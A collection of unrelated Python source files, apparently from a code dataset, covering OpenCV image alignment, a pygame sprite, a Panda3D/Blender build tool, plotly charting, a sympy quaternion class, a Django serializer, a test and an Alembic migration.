master_data = cv2.copyMakeBorder(master_srcdata, padding, padding, padding, padding, cv2.BORDER_CONSTANT,value=(255, 255, 255))
cv2.line(master_data, (0, 1000), (5000, 1000), (0, 255, 0), 2)
cv2.line(master_data, (0, 2000), (5000, 2000), (0, 255, 0), 2)
cv2.line(master_data, (1000, 0), (1000, 3000), (0, 255, 0), 2)
cv2.line(master_data, (2000, 0), (2000, 3000), (0, 255, 0), 2)
cv2.line(master_data, (3000, 0), (3000, 3000), (0, 255, 0), 2)
cv2.line(master_data, (4000, 0), (4000, 3000), (0, 255, 0), 2)
cv2.imwrite("master_data.jpg", master_data)
def pad_imgs(master3, target3):
master_h, master_w, _ = master3.shape
target_h, target_w, _ = target3.shape
assert master_h == target_h and master_w == target_w
src_w = master_w
src_h = master_h
mid_h = int(max(2000, np.ceil(src_h/1000)*1000))
mid_w = int(max(2000, np.ceil(src_w/1000)*1000))
assert mid_w >= src_w and mid_h >= src_h
left_pad = int((mid_w-src_w)/2)
right_pad = int(mid_w - src_w - left_pad)
top_pad = int((mid_h - src_h) / 2)
down_pad = int(mid_h - src_h - top_pad)
master3_pad = cv2.copyMakeBorder(master3, top_pad, down_pad, left_pad, right_pad, cv2.BORDER_REFLECT)
target3_pad = cv2.copyMakeBorder(target3, top_pad, down_pad, left_pad, right_pad, cv2.BORDER_REFLECT)
return master3_pad, target3_pad, top_pad, down_pad, left_pad, right_pad
MAX_FEATURES = 5000
GOOD_MATCH_PERCENT = 0.45
def alignImages_Perspective(img1, img2):
im1Gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
im2Gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
# Detect ORB features and compute descriptors.
orb = cv2.ORB_create(MAX_FEATURES)
keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)
keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)
# Match features.
matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
matches = list(matcher.match(descriptors1, descriptors2, None))
# Sort matches by score
matches.sort(key=lambda x: x.distance, reverse=False)
# Remove not so good matches
numGoodMatches = int(len(matches) * GOOD_MATCH_PERCENT)
matches = matches[:numGoodMatches]
# Extract location of good matches
points1 = np.zeros((len(matches), 2), dtype=np.float32)
points2 = np.zeros((len(matches), 2), dtype=np.float32)
for i, match in enumerate(matches):
points1[i, :] = keypoints1[match.queryIdx].pt
points2[i, :] = keypoints2[match.trainIdx].pt
height, width, channels = img2.shape
# Perspective
h, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
im1Reg_Perspective = cv2.warpPerspective(img1, h, (width, height)) # 透视变换
return im1Reg_Perspective
def process_single_imgpart(img_master, target_img):
master_height, master_width, _ = img_master.shape
cur_height, cur_width, _ = target_img.shape
assert cur_width == master_width
top_pad, down_pad = 0, 0
target_imgpad = target_img.copy()
if master_height > cur_height:
top_pad = int((master_height - cur_height)/2)
down_pad = master_height - cur_height - top_pad
target_imgpad = cv2.copyMakeBorder(target_img, top_pad, down_pad, 0, 0, cv2.BORDER_CONSTANT, value=(255, 255, 255))
elif master_height < cur_height:
print("cur_height > master_height", cur_height, master_height)
img_show = target_imgpad.copy()
im2Gray = cv2.cvtColor(target_imgpad, cv2.COLOR_BGR2GRAY)
im1Reg_Perspective = alignImages_Perspective(img_master, target_imgpad)
imRegGray = cv2.cvtColor(im1Reg_Perspective, cv2.COLOR_BGR2GRAY)
diff = cv2.absdiff(imRegGray, im2Gray)
# cv2.imwrite("diff.jpg", diff)
ret, thresh = cv2.threshold(diff, 120, 255, cv2.THRESH_BINARY) # 120
# cv2.imwrite("thresh.jpg", thresh)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 1 and area < max(cur_height, cur_width):
cv2.drawContours(img_show, cnt, -1, (0, 0, 255), 2)
img_out = img_show[top_pad: master_height - down_pad, :, : ]
return img_out
if __name__ == "__main__":
# draw_img()
# exit()
root = "../data/"
master_srcdata = cv2.imread(root + "OK1_1.jpg")
target_srcdata = cv2.imread(root + "NG1_1.jpg")
master3 = master_srcdata[300:4850,:,:]
# cv2.imwrite("master3.jpg", master3)
target3 = target_srcdata[720:5270,:,:]
# cv2.imwrite("target3.jpg", target3)
# padding to 1000s, at least 2000
master3_pad, target3_pad, top_pad, down_pad, left_pad, right_pad = pad_imgs(master3, target3)
# cv2.imwrite("master3_pad.jpg", master3_pad)
# cv2.imwrite("target3_pad.jpg", target3_pad)
masterpad_h, masterpad_w, _ = master3_pad.shape
master_reg_pad = bilinear_interpolation_of_patch_registration(master3_pad, target3_pad)
master3_reg = master_reg_pad[top_pad: masterpad_h-down_pad, left_pad:masterpad_w-right_pad, : ]
cv2.imwrite("master3_reg.jpg", master3_reg)
cv2.imwrite("master3.jpg", master3)
cv2.imwrite("target3.jpg", target3)
# Stage Five: high-precision feature alignment
master_reg_out = process_single_imgpart(master3_reg, target3)
cv2.imwrite("master_reg_out.jpg", master_reg_out)
master_out = process_single_imgpart(master3, target3)
cv2.imwrite("master_out.jpg", master_out) | 7,810 | 3,294 |
# Copyright (c) 2020
# [This program is licensed under the "MIT License"]
# Please see the file LICENSE in the source
# distribution of this software for license terms.
import pygame as pg
import ruamel.yaml
from random import choice
vec = pg.math.Vector2
class Weapon_VFX(pg.sprite.Sprite):
"""
Weapon_VFX appear when the player is shooting.
Cycling between available img options provides
animation effect.
"""
def __init__(
self,
settings: ruamel.yaml.comments.CommentedMap,
game_client_data_weaponvfx: list,
pos: vec,
):
self.settings = settings
self._layer = self.settings["layer"]["vfx"]
pg.sprite.Sprite.__init__(self)
self.image = pg.transform.scale(
choice(game_client_data_weaponvfx),
(
self.settings["gen"]["tilesize"],
self.settings["gen"]["tilesize"],
),
)
self.rect = self.image.get_rect()
self.pos = self.rect.center = pos
self.spawn_time = pg.time.get_ticks()
def update(self):
if (
pg.time.get_ticks() - self.spawn_time
> self.settings["weapon"]["vbullet"]["fx_life"]
):
self.kill()
| 1,253 | 390 |
import fnmatch
import os
import shutil
import subprocess
import sys
import time
from collections import OrderedDict
try:
import configparser
except ImportError:
import ConfigParser as configparser
class PManException(Exception):
pass
class NoConfigError(PManException):
pass
class CouldNotFindPythonError(PManException):
pass
class BuildError(PManException):
pass
class FrozenEnvironmentError(PManException):
def __init__(self):
PManException.__init__(self, "Operation not supported in frozen applications")
if '__file__' not in globals():
__is_frozen = True
__file__ = ''
else:
__is_frozen = False
_config_defaults = OrderedDict([
('general', OrderedDict([
('name', 'Game'),
('render_plugin', ''),
])),
('build', OrderedDict([
('asset_dir', 'assets/'),
('export_dir', 'game/assets/'),
('ignore_patterns', '*.blend1, *.blend2'),
])),
('run', OrderedDict([
('main_file', 'game/main.py'),
('auto_build', True),
('auto_save', True),
])),
])
_user_config_defaults = OrderedDict([
('blender', OrderedDict([
('last_path', 'blender'),
('use_last_path', True),
])),
])
def __py2_read_dict(config, d):
for section, options in d.items():
config.add_section(section)
for option, value in options.items():
config.set(section, option, value)
def _get_config(startdir, conf_name, defaults):
try:
if startdir is None:
startdir = os.getcwd()
except FileNotFoundError:
# The project folder was deleted on us
raise NoConfigError("Could not find config file")
dirs = os.path.abspath(startdir).split(os.sep)
while dirs:
cdir = os.sep.join(dirs)
if cdir.strip() and conf_name in os.listdir(cdir):
configpath = os.path.join(cdir, conf_name)
config = configparser.ConfigParser()
if hasattr(config, 'read_dict'):
config.read_dict(defaults)
else:
__py2_read_dict(config, defaults)
config.read(configpath)
config.add_section('internal')
config.set('internal', 'projectdir', os.path.dirname(configpath))
return config
dirs.pop()
# No config found
raise NoConfigError("Could not find config file")
def get_config(startdir=None):
return _get_config(startdir, '.pman', _config_defaults)
def get_user_config(startdir=None):
try:
return _get_config(startdir, '.pman.user', _user_config_defaults)
except NoConfigError:
# No user config, just create one
config = get_config(startdir)
fp = os.path.join(config.get('internal', 'projectdir'), '.pman.user')
print("Creating user config at {}".format(fp))
with open(fp, 'w') as f:
pass
return _get_config(startdir, '.pman.user', _user_config_defaults)
def _write_config(config, conf_name):
writecfg = configparser.ConfigParser()
writecfg.read_dict(config)
writecfg.remove_section('internal')
with open(os.path.join(config.get('internal', 'projectdir'), conf_name), 'w') as f:
writecfg.write(f)
def write_config(config):
_write_config(config, '.pman')
def write_user_config(user_config):
_write_config(user_config, '.pman.user')
def is_frozen():
return __is_frozen
def get_python_program(config):
python_programs = [
'ppython',
'python3',
'python',
'python2',
]
# Check to see if there is a version of Python that can import panda3d
for pyprog in python_programs:
args = [
pyprog,
'-c',
'import panda3d.core; import direct',
]
with open(os.devnull, 'w') as fp:
try:
retcode = subprocess.call(args, stderr=fp)
except FileNotFoundError:
retcode = 1
if retcode == 0:
return pyprog
# We couldn't find a python program to run
raise CouldNotFindPythonError('Could not find a usable Python install')
def create_project(projectdir):
if is_frozen():
raise FrozenEnvironmentError()
confpath = os.path.join(projectdir, '.pman')
if os.path.exists(confpath):
print("Updating project in {}".format(projectdir))
else:
print("Creating new project in {}".format(projectdir))
# Touch config file to make sure it is present
with open(confpath, 'a') as f:
pass
config = get_config(projectdir)
write_config(config)
templatedir = os.path.join(os.path.dirname(__file__), 'templates')
print("Creating directories...")
dirs = [
'assets',
'game',
]
bpanda_mod_files = [
os.path.join(templatedir, '__init__.py'),
os.path.join(templatedir, 'bpbase.py'),
'rendermanager.py',
'pman.py',
'pman_build.py',
]
dirs = [os.path.join(projectdir, i) for i in dirs]
for d in dirs:
if os.path.exists(d):
print("\tSkipping existing directory: {}".format(d))
else:
print("\tCreating directory: {}".format(d))
os.mkdir(d)
print("Creating main.py")
with open(os.path.join(templatedir, 'main.py')) as f:
main_data = f.read()
mainpath = os.path.join(projectdir, 'game', 'main.py')
if os.path.exists(mainpath):
print("\tmain.py already exists at {}".format(mainpath))
else:
with open(mainpath, 'w') as f:
f.write(main_data)
print("\tmain.py created at {}".format(mainpath))
bpmodpath = os.path.join(projectdir, 'game/blenderpanda')
if os.path.exists(bpmodpath):
print("Updating blenderpanda module")
shutil.rmtree(bpmodpath)
else:
print("Creating blenderpanda module")
os.mkdir(bpmodpath)
for cf in bpanda_mod_files:
bname = os.path.basename(cf)
print("\tCopying over {}".format(bname))
cfsrc = os.path.join(os.path.dirname(__file__), cf)
cfdst = os.path.join(projectdir, 'game', 'blenderpanda', bname)
shutil.copy(cfsrc, cfdst)
print("\t\t{} created at {}".format(bname, cfdst))
def get_abs_path(config, path):
return os.path.join(
config.get('internal', 'projectdir'),
path
)
def get_rel_path(config, path):
return os.path.relpath(path, config.get('internal', 'projectdir'))
def build(config=None):
if is_frozen():
raise FrozenEnvironmentError()
if config is None:
config = get_config()
user_config = get_user_config(config.get('internal', 'projectdir'))
if hasattr(time, 'perf_counter'):
stime = time.perf_counter()
else:
stime = time.time()
print("Starting build")
srcdir = get_abs_path(config, config.get('build', 'asset_dir'))
dstdir = get_abs_path(config, config.get('build', 'export_dir'))
if not os.path.exists(srcdir):
raise BuildError("Could not find asset directory: {}".format(srcdir))
if not os.path.exists(dstdir):
print("Creating asset export directory at {}".format(dstdir))
os.makedirs(dstdir)
print("Read assets from: {}".format(srcdir))
print("Export them to: {}".format(dstdir))
ignore_patterns = [i.strip() for i in config.get('build', 'ignore_patterns').split(',')]
print("Ignoring file patterns: {}".format(ignore_patterns))
num_blends = 0
for root, dirs, files in os.walk(srcdir):
for asset in files:
src = os.path.join(root, asset)
dst = src.replace(srcdir, dstdir)
ignore_pattern = None
for pattern in ignore_patterns:
if fnmatch.fnmatch(asset, pattern):
ignore_pattern = pattern
break
if ignore_pattern is not None:
print('Skip building file {} that matched ignore pattern {}'.format(asset, ignore_pattern))
continue
if asset.endswith('.blend'):
dst = dst.replace('.blend', '.bam')
if os.path.exists(dst) and os.stat(src).st_mtime <= os.stat(dst).st_mtime:
print('Skip building up-to-date file: {}'.format(dst))
continue
if asset.endswith('.blend'):
# Handle with Blender
num_blends += 1
else:
print('Copying non-blend file from "{}" to "{}"'.format(src, dst))
if not os.path.exists(os.path.dirname(dst)):
os.makedirs(os.path.dirname(dst))
shutil.copyfile(src, dst)
if num_blends > 0:
blender_path = user_config.get('blender', 'last_path') if user_config.getboolean('blender', 'use_last_path') else 'blender'
args = [
blender_path,
'-b',
'-P',
os.path.join(os.path.dirname(__file__), 'pman_build.py'),
'--',
srcdir,
dstdir,
]
#print("Calling blender: {}".format(' '.join(args)))
subprocess.call(args, env=os.environ.copy())
if hasattr(time, 'perf_counter'):
etime = time.perf_counter()
else:
etime = time.time()
print("Build took {:.4f}s".format(etime - stime))
def run(config=None):
if is_frozen():
raise FrozenEnvironmentError()
if config is None:
config = get_config()
if config.getboolean('run', 'auto_build'):
build(config)
mainfile = get_abs_path(config, config.get('run', 'main_file'))
print("Running main file: {}".format(mainfile))
args = [get_python_program(config), mainfile]
#print("Args: {}".format(args))
subprocess.Popen(args, cwd=config.get('internal', 'projectdir'))
| 9,860 | 3,123 |
import sys
import plotly
import plotly.plotly as py
import plotly.graph_objs as go
#Argument 1 must be your plotly username, argument 2 is your api key. Get those by registering for a plotly account.
#Argument 3 is the name of the input file to input data from. Must be in the form: Date \n Download \n Upload \n
plotly.tools.set_credentials_file(username=sys.argv[1], api_key=sys.argv[2])
time = []
download = []
upload = []
lnum = 1
x = 1
file = open(sys.argv[3], 'r')
for line in file:
if lnum == 1:
#time.append(line[11:13])
time.append(x)
x += 1
lnum = 2
elif lnum == 2:
download.append(line[10:15])
lnum = 3
elif lnum == 3:
upload.append(line[8:12])
lnum = 1
else:
raise SystemError('lnum internal error', lnum)
#trace1 = go.Histogram(
# x=time,
# y=download,
# opacity=0.75
#)
#trace2 = go.Histogram(
# x=time,
# y=upload,
# opacity=0.75
#)
#data = [trace1, trace2]
#layout = go.Layout(barmode='overlay')
#fig = go.Figure(data=data, layout=layout)
#py.iplot(fig, filename='Network Speed Graph')
trace1 = go.Bar(
x=time,
y=download,
name='Download Speed'
)
trace2 = go.Bar(
x=time,
y=upload,
name='Upload Speed'
)
data = [trace1, trace2]
layout = go.Layout(
barmode='group'
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig, filename='Network Speed Graph')
| 1,326 | 569 |
from crosshair.libimpl import builtinslib
from crosshair.libimpl import collectionslib
from crosshair.libimpl import datetimelib
from crosshair.libimpl import mathlib
from crosshair.libimpl import randomlib
from crosshair.libimpl import relib
def make_registrations():
builtinslib.make_registrations()
collectionslib.make_registrations()
datetimelib.make_registrations()
mathlib.make_registrations()
randomlib.make_registrations()
relib.make_registrations()
| 484 | 150 |
import re
from django.urls import reverse
from rest_framework import serializers
from schedulesy.apps.ade_legacy.models import Customization
class CustomizationSerializer(serializers.ModelSerializer):
configuration = serializers.SerializerMethodField()
class Meta:
model = Customization
fields = '__all__'
def to_internal_value(self, data):
d = super().to_internal_value(data)
if 'configuration' in data and type(data['configuration'] == dict):
d['configuration'] = data['configuration']
return d
def get_configuration(self, obj):
lc = obj.local_customization
return lc.configuration if lc else {}
| 690 | 181 |
"""
Test Filter Operator
"""
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from gva.flows.operators import FilterOperator
try:
from rich import traceback
traceback.install()
except ImportError:
pass
def test_filter_operator_default():
in_d = {'a':1}
n = FilterOperator()
d, c = n.execute(in_d)
assert d == in_d
def test_filter_operator():
ds = [
{"value":1},
{"value":2},
{"value":3},
{"value":4}
]
def is_even(val):
return val.get('value') % 2 == 0
op = FilterOperator(condition=is_even)
res = [op(row) for row in ds]
assert res[0] is None
assert res[1] == ({'value': 2}, {})
assert res[2] is None
assert res[3] == ({'value': 4}, {})
if __name__ == "__main__":
test_filter_operator_default()
test_filter_operator()
print('okay') | 927 | 357 |
# -*- coding: utf-8 -*-
"""
Created on Tue May 25 10:24:05 2021
@author: danaukes
https://en.wikipedia.org/wiki/Rotation_formalisms_in_three_dimensions
https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation
https://en.wikipedia.org/wiki/Conversion_between_quaternions_and_Euler_angles
"""
import sympy
sympy.init_printing(pretty_print=False)
from sympy import sin,cos,tan,pi,acos
import numpy
def array(input1):
# return numpy.array(input1)
return sympy.Matrix(input1)
def cross(a,b):
# return numpy.cross(a,b)
return a.cross(b)
def dot(a,b):
return a.dot(b)
class Quaternion(object):
def __init__(self,e0,e1,e2,e3):
self.e = [e0,e1,e2,e3]
@classmethod
def build_from_axis_angle(cls,theta,x,y,z):
e0 = cos(theta/2)
s = sin(theta/2)
e1 = s*x
e2 = s*y
e3 = s*z
return UnitQuaternion(e0,e1,e2,e3)
def norm(self):
return self.norm_squared()**.5
def norm_squared(self):
e = sympy.Matrix(self.e)
return sum([item**2 for item in e])
def __mul__(self,other):
if type(other) in [int,float]:
other = Quaternion(other,0,0,0)
return self.hamilton_product(other)
def __truediv__(self,other):
if type(other) in [int,float]:
other = Quaternion(1/other,0,0,0)
return self.hamilton_product(other)
else:
other = Quaternion(1/other,0,0,0)
return self.hamilton_product(other)
# raise TypeError
def __str__(self):
e = []
for item in self.e:
if type(item) in [int,float]:
a='{0:.3f}'.format(item)
else:
a=str(item)
e.append(a)
s = 'Q({0},{1},{2},{3})'.format(*e)
return s
def __repr__(self):
return str(self)
def hamilton_product(self,other):
e01 = self.e[0]
e02 = other.e[0]
e11 = self.e[1]
e12 = other.e[1]
e21 = self.e[2]
e22 = other.e[2]
e31 = self.e[3]
e32 = other.e[3]
e0 = e01*e02-e11*e12-e21*e22-e31*e32
e1 = e01*e12+e11*e02+e21*e32-e31*e22
e2 = e01*e22-e11*e32+e21*e02+e31*e12
e3 = e01*e32+e11*e22-e21*e12+e31*e02
return Quaternion(e0,e1,e2,e3)
def scalar(self):
return self.e0
def vector(self):
vector = self.e[1:]
return array(vector)
def conjugate(self):
new = type(self)(self.e[0],-self.e[1],-self.e[2],-self.e[3])
return new
def inv(self):
new = self.conjugate()/self.norm_squared()
return new
def unit(self):
result = self/self.norm()
return UnitQuaternion(*result)
def rotate_by(self,q):
new = q.rotate(self)
return new
def sum(self,other):
new = Quaternion(self.e[0]+other.e[0],self.e[1]+other.e[1],self.e[2]+other.e[2],self.e[3]+other.e[3])
return new
# def multiply(self,other):
# e0 = self.e0*other.e0-dot(self.vector(),other.vector())
# v = self.e0*other.vector()+other.e0*self.vector()+cross(self.vector(),other.vector())
# new = Quaternion(e0,*v)
# return new
def expand(self):
e = sympy.Matrix(self.e)
new = Quaternion(*(e.expand()))
return new
def conjugation(self,other):
result = other*self*other.inv()
return result
def __getitem__(self, index):
if isinstance(index, int):
return self.e[index]
elif isinstance(index, slice):
return self.e[index]
def __setitem__(self, index, v):
if isinstance(index, int):
self.e[index] = v
elif isinstance(index, slice):
if isinstance(v,Quaternion):
self.list[index] = v.e
elif isinstance(v,list):
self.list[index] = v
else:
raise(Exception())
def __iter__(self):
for item in self.e:
yield item
def __len__(self):
return len(self.e)
class UnitQuaternion(Quaternion):
@classmethod
def build_from_axis_angle(cls,theta,x,y,z):
e0 = cos(theta/2)
s = sin(theta/2)
e1 = s*x
e2 = s*y
e3 = s*z
return cls(e0,e1,e2,e3)
def hamilton_product(self, other):
result = super(UnitQuaternion,self).hamilton_product(other)
if isinstance(other,UnitQuaternion):
result = UnitQuaternion(*result)
return result
def rotate(self,other):
l=len(other)
if l==3:
other = Quaternion(0,*other)
result = other.conjugation(self)
if l==3:
result=result.vector()
if isinstance(other,UnitQuaternion):
return UnitQuaternion(*result)
else:
return result
# q = self
# t = 2*cross(q.vector(),v.vector())
# new = v.vector()+q.e[0]*t+cross(q.vector(),t)
# new = Quaternion(sympy.Number(0),*new)
# return new
def inv(self):
return self.conjugate()
def unit(self):
return self
class VectorQuaternion(Quaternion):
def __init__(self,e1,e2,e3):
self.e=[0,e1,e2,e3]
import sympy
a,b,c,d = sympy.symbols('a,b,c,d')
e,f,g,h = sympy.symbols('e,f,g,h')
q = sympy.Symbol('q')
v1 = Quaternion(a,b,c,d)
v12 = [b,c,d]
q = UnitQuaternion(e,f,g,h)
# q = Quaternion.build_from_axis_angle(q, 0,0,1)
# v1 = Quaternion(0,2,3,4)
v2 = v1.rotate_by(q)
v22 = q*v1*q.inv()
v3 = q.rotate(v12)
| 5,620 | 2,166 |
"""Adds voice category per channel
Revision ID: 6e982c9318a6
Revises: ef54f035a75c
Create Date: 2021-12-03 13:18:57.468342
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "6e982c9318a6"
down_revision = "ef54f035a75c"
branch_labels = None
depends_on = None
def upgrade():
op.add_column(
"channels",
sa.Column(
"voice_category",
sa.String(length=50),
nullable=True,
server_default=sa.text("'SpellBot Voice Channels'"),
),
)
def downgrade():
op.drop_column("channels", "voice_category")
| 630 | 260 |